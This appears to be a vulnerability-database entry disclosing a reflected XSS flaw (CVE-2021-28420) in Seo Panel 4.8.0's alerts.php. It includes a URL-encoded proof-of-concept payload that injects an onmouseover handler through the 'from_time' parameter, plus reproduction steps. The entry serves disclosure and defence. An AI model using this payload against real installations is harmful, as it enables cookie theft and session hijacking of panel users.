Lucene search
Piyush Patil1337DAY-ID-36336HistoryJun 02, 2021 - 12:00 a.m.
Seo Panel 4.8.0 - (from_time) Reflected XSS Vulnerability
2021-06-0200:00:00
Piyush Patil
0day.today
23
0.002 Low
EPSS
Percentile
51.7%
# Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Version: Seo Panel 4.8.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-28420
-Description:
A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote
attackers to inject JavaScript via alerts.php and the "from_time" parameter.
-Payload used:
x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
-Steps to reproduce:
1- Login to SEO admin panel
2- Visit: http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11
3- Hover your mouse to "Period" field
Related
osv
osv
CVE-2021-28420
2021-03-18 12:15:12
BIT-seopanel-2021-28420
2024-03-06 11:06:23
nvd
nvd
CVE-2021-28420
2021-03-18 12:15:12
cvelist
cvelist
CVE-2021-28420
2021-03-18 11:58:04
cve
cve
CVE-2021-28420
2021-03-18 12:15:12
prion
prion
Cross site scripting
2021-03-18 12:15:00
exploitdb
exploitdb
Seo Panel 4.8.0 - 'from_time' Reflected XSS
2021-06-03 00:00:00